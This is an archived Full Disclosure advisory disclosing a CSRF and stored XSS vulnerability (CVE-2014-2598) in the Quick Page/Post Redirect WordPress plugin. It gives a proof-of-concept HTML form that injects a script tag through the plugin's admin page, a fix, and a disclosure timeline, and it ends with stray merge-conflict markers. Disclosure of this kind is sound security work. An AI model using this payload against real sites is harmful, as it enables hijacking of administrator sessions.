[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] CSRF and stored XSS in Quick Page/Post Redirect Plugin (WordPress plugin)
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] CSRF and stored XSS in Quick Page/Post Redirect Plugin (WordPress plugin)
- From: dxw Security <security@xxxxxxx>
- Date: Fri, 11 Apr 2014 12:58:02 +0000
Details
================
Software: Quick Page/Post Redirect Plugin
Version: 5.0.3
Homepage: http://wordpress.org/plugins/quick-pagepost-redirect-plugin/
Advisory ID: dxw-1970-1091
CVE: CVE-2014-2598
CVSS: 6.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:P)
Description
================
CSRF and stored XSS in Quick Page/Post Redirect Plugin
Vulnerability
================
This plugin is vulnerable to a combination CSRF/XSS attack meaning that if an
admin user can be persuaded to visit a URL of the attacker’s choosing (via
spear phishing for instance), the attacker can insert arbitrary JavaScript into
an admin page. Once that occurs the admin’s browser can be made to do almost
anything the admin user could typically do such as create/delete posts, create
new admin users, or even exploit vulnerabilities in other plugins.
Proof of concept
================
Use the following form to introduce potentially malicious JavaScript:
<form method=\"POST\"
action=\"http://localhost/wp-admin/admin.php?page=redirect-updates\">
<input type=\"text\" name=\"quickppr_redirects[request][]\"
value=\""><script>alert(1)</script>\">
<input type=\"text\" name=\"quickppr_redirects[destination][]\"
value=\"http://dxw.com/\">
<Input type=\"text\" name=\"submit_301\" value=\"1\">
<input type=\"submit\">
</form>
Mitigations
================
Upgrade to version 5.0.5 or later.
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our
disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@xxxxxxx to acknowledge this report if you
received it via a third party (for example, plugins@xxxxxxxxxxxxx) as they
generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this
report with 14 days.
Timeline
================
2014-03-21: Discovered
2014-03-24: Reported to plugins@xxxxxxxxxxxxx
2014-04-07: No response; requested an alternative email address using the
author’s contact form.
2014-04-08: Re-reported direct to author
2014-04-08: Author responded, and publication agreed on or before 2014-05-06
2014-04-10: Author reports issue fixed in version 5.0.5
<<<<<<< HEAD
Discovered by dxw:
================
Tom Adams
=======
Discovered by dxw:
================
Tom Adams
>>>>>>> 65c687d5cb3c4aa66c28a30a4f2aaf33169dc464
Please visit security.dxw.com for more information.
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/